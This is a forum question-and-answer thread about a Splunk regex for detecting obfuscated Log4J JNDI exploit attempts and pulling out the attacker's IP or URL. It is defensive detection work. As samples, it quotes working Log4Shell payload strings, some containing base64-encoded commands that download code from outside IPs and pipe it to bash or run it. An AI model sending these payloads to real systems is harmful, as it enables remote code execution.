Please help me improve this Log4J Regex that pulls out possible Malicious Sources

Question

I'm trying to use this regex to pull out Malicious IPs or Malicious URLs from Log4J exploit attempts using the SIEM (Security Incident Event Management) "Splunk". Problem being, I'm running into regex limits in Splunk. I've tried to improve it in regex101.

This regex works well so far, but I'm running out of memory in "Splunk"

Regex Step Count: ~2000

Requirements of the regex:

detects obfuscated log4j exploit attempts
pulls out the Malicious IP or URL that the attacker wants to be queried

Regex used so far
`(\$\|%24)(\{\|%7B)([^jJ][jJ])([^nN][nN])([^dD][dD])([^iI][iI])(:\|%3A\|\$\|%24\|}\|%7D)(?<Exploit>.?)((\:\|%3A)?)(\/\/\|%2F%2F)(((?<MaliciousSource_IP>(\d{1,3}(?:\.\d{1,3}){3}))(?:(.?)))\|(?<MaliciousSource_URL>((([\=\.\$\_\:\{\}]?)\|(%24)\|(%7B)\|(%7D))?[\w\d\.]+?[\.\/\:\=]?)+))((%7D\|\}){1})`

Examples of Log4J
`${jndi:ldap://${hostName}.c6qgldh5g22l07bu1lvgcg4ukyyygg3tw.example.com/a}`
`$%7Bjndi:ldap://161.104.129.3:1389/Exploit%7D`
`${jndi:ldaps://probe001.log4j.example.net:9200/b}`
`${jndi:ldap://161.104.129.3:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zNC4yMTUuNDguMTA2OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8zNC4yMTUuNDguMTA2OjQ0Myl8YmFzaA==}`
`$%7Bjndi:ldap://$%7BhostName%7D_solr.c78v36tibg0r9p1hgukgc8e9jaaydcyag.ns1.exploitexample.com%7D`
`%24%7B%24%7B%3A%3Aj%7Dndi%3Armi%3A%2F%2F161.104.129.3%3A1389%2FBinary%7D`
`${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://161.104.129.3:1389/Binary}`
`${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//161.104.129.3:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgLU8gaHR0cDovLzIuNTguMTQ5LjIwNi9yc3RhcjsgY2htb2QgNzc3IHN0YXI7IC4vc3RhciBleHBsb2l0}`

Hoping to learn from the regex masters or anyone who has input on this :)

score 1 · Answer 1 · answered Jan 07 '22 at 16:04

Based on the samples you provided, this regex seems to match what you're looking for:

([\$]|[\%24]){1,3}(?<suspicious_log4j>([\{]|[\%7B]{1,3}).*[jJnNdDiI]{1,4}.+[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)

Check out Regex101's "EXPLANATION" box for what it's doing

But it returns 8 matches in 686 steps

Please help me improve this Log4J Regex that pulls out possible Malicious Sources

1 Answers1

Linked